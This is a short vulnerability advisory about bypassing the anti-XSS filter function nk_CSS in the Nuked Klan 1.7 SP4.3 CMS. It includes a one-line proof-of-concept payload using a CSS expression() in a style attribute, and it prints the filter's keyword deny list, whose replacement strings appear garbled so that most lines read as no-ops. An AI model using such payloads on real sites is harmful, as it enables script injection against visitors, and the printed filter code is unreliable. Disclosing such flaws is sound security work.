Nuked Klan 1.7 SP4.3 : Function Anti-XSS Bypassed

2006.09.02
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

// *- BEGIN -* // By Blwood // http://blwood.net <http://blwood.net/> We can bypassed the function anti-xss called nk_CSS ( nuked.php) using like this : <b id="blwood" style="width:expression(alert(' http://www.blwood.net')) <http://www.blwood.net%27%29%29/>"></b> Here is the function : function nk_CSS($str) { if ($str != "") { $str = eregi_replace("content-disposition:","conten ;t-dispositio n:",$str); $str = eregi_replace("content-type:","content -type:",$str); $str = eregi_replace("content-transfer-encoding:","conte ;nt-transfer-&# 101;ncoding:",$str); $str = eregi_replace("include","include",$str ); $str = eregi_replace("<?","<?",$str); $str = eregi_replace("<?php","<?php",$str); $str = eregi_replace("?>","?>",$str); $str = eregi_replace("script","script",$str); $str = eregi_replace("eval","eval",$str); $str = eregi_replace("javascript","javascri ;pt",$str); $str = eregi_replace("embed","embed",$str); $str = eregi_replace("iframe","iframe",$str); $str = eregi_replace("refresh", "refresh", $str); $str = eregi_replace("onload", "onload", $str); $str = eregi_replace("onstart", "onstart", $str); $str = eregi_replace("onerror", "onerror", $str); $str = eregi_replace("onabort", "onabort", $str); $str = eregi_replace("onblur", "onblur", $str); $str = eregi_replace("onchange", "onchange", $str); $str = eregi_replace("onclick", "onclick", $str); $str = eregi_replace("ondblclick", "ondblclick", $str); $str = eregi_replace("onfocus", "onfocus", $str); $str = eregi_replace("onkeydown", "onkeydown", $str); $str = eregi_replace("onkeypress", "onkeypress", $str); $str = eregi_replace("onkeyup", "onkeyup", $str); $str = eregi_replace("onmousedown", "onmousedown", $str); $str = eregi_replace("onmousemove", "onmousemove", $str); $str = eregi_replace("onmouseover", "onmouseover", $str); $str = eregi_replace("onmouseout", "onmouseout", $str); $str = eregi_replace("onmouseup", "onmouseup", $str); $str = eregi_replace("onreset", "onreset", $str); $str = eregi_replace("onselect", "onselect", $str); $str = eregi_replace("onsubmit", "onsubmit", $str); $str = eregi_replace("onunload", "onunload", $str); $str = eregi_replace("document", "document", $str); $str = eregi_replace("cookie", "cookie", $str); $str = eregi_replace("vbscript", "vbscript", $str); $str = eregi_replace("location", "location", $str); $str = eregi_replace("object", "object", $str); $str = eregi_replace("vbs", "vbs", $str); $str = eregi_replace("href", "href", $str); $str = eregi_replace("src", "src", $str); } return($str); } // *- END -*


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top